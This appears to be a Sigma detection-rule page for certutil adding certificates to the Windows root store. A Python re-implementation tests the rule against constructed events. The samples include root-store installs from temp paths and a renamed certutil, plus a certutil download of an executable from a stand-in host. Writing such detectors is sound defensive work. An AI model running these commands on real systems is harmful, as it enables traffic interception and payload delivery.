
New Root Certificate Installed Via Certutil.EXE

Sigma Rules

Summary
This detection rule identifies executions of the Windows command-line utility `certutil` that install a certificate into a root certificate store. Adversaries use this technique (ATT&CK T1553.004, Install Root Certificate) so that TLS connections to web servers they control, or traffic intercepted by a proxy they operate, raise no certificate warnings on the victim host. The rule triggers on `certutil` process creation when the command line contains both the `-addstore` argument, which adds a certificate to a named store, and the word `root`, the name of the Trusted Root Certification Authorities store (for example `certutil -addstore root evil.cer`; the `-user` variant writes to the current user's root store and needs no administrative rights). Matching on `certutil` should cover the binary's original file name as well as its path, since attackers routinely rename it. Adding an unauthorized root certificate undermines every trust decision the system makes afterwards and enables man-in-the-middle interception of otherwise encrypted traffic, so the rule belongs in any environment where the integrity of the certificate store matters. Expect false positives from legitimate IT operations such as corporate root CA rollouts by software deployment tools, and note that the `root` match is a case-insensitive substring test, so a command like `certutil -addstore CA rootca.cer` also fires; tune by parent process, user or deployment tooling before relying on the rule for alerting.
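To make the matching logic concrete, the following is an added example, not code from the Sigma project or from this rule's author. It re-implements the detection described above in Python and runs it over a handful of constructed Sysmon-style process-creation events (field names `Image`, `OriginalFileName`, `CommandLine` and `ParentImage` follow Sigma conventions; the paths, file names and the `CorpDeploy` agent used for tuning are hypothetical). It also shows the renamed-binary case, the `-user` store, the `rootca.cer` substring false positive, and a simple parent-process allowlist for tuning.

```python
"""Re-implementation of the 'New Root Certificate Installed Via Certutil.EXE'
logic (added example, not the Sigma rule itself), run over constructed events."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str                      # full path of the created process
    command_line: str
    original_file_name: str = ""    # PE OriginalFileName, survives renaming
    parent_image: str = ""


def _contains_all(haystack: str, needles: tuple) -> bool:
    # Sigma 'contains' modifiers are case-insensitive substring tests.
    lowered = haystack.lower()
    return all(n.lower() in lowered for n in needles)


def is_certutil(ev: ProcessEvent) -> bool:
    # Match on the path OR the PE's original name so a renamed copy still hits.
    return (ev.image.lower().endswith("\\certutil.exe")
            or ev.original_file_name.lower() == "certutil.exe")


def matches_rule(ev: ProcessEvent) -> bool:
    """True when the event would trigger the rule: certutil + -addstore + root."""
    return is_certutil(ev) and _contains_all(ev.command_line, ("-addstore", "root"))


# Hypothetical allowlist of deployment agents that legitimately install root CAs.
ALLOWED_PARENTS = {r"c:\program files\corpdeploy\agent.exe"}


def matches_rule_tuned(ev: ProcessEvent) -> bool:
    """Rule plus a parent-process allowlist, the tuning step the summary calls for."""
    return matches_rule(ev) and ev.parent_image.lower() not in ALLOWED_PARENTS


# Constructed sample events (none of these paths or hosts are real).
EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",               # 0: classic TP
                 r"certutil.exe -addstore root C:\Users\bob\AppData\Local\Temp\update.cer",
                 "CertUtil.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Users\bob\Downloads\svchost.exe",              # 1: renamed certutil
                 r'svchost.exe -addstore -f "Root" C:\Users\bob\ca.cer',
                 "CertUtil.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",               # 2: user store, no admin
                 r"certutil -addstore -user Root C:\temp\proxy.cer",
                 "CertUtil.exe", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",               # 3: intermediate store
                 r"certutil -addstore CA C:\certs\intermediate.cer",
                 "CertUtil.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",               # 4: download, not -addstore
                 r"certutil -urlcache -split -f http://example.invalid/a.exe a.exe",
                 "CertUtil.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",               # 5: FP, 'root' in filename
                 r"certutil -addstore CA C:\certs\rootca.cer",
                 "CertUtil.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",               # 6: corporate rollout
                 r"certutil -addstore root C:\ProgramData\CorpDeploy\corp-root.cer",
                 "CertUtil.exe", r"C:\Program Files\CorpDeploy\agent.exe"),
]


def alerts(events, tuned: bool = False) -> list:
    """Return the indexes of events that fire, optionally after tuning."""
    check = matches_rule_tuned if tuned else matches_rule
    return [i for i, ev in enumerate(events) if check(ev)]


if __name__ == "__main__":
    for i in alerts(EVENTS):
        print(f"ALERT  #{i}: {EVENTS[i].command_line}")
    print("after tuning:", alerts(EVENTS, tuned=True))
```

Event 5 fires even though it installs into the `CA` store, which is the substring caveat from the summary; event 6 shows why a parent-process allowlist is the usual first tuning step, and event 1 shows why `OriginalFileName` must be part of the match.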
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
  • Command
ATT&CK Techniques
  • T1553.004
Created: 2023-03-05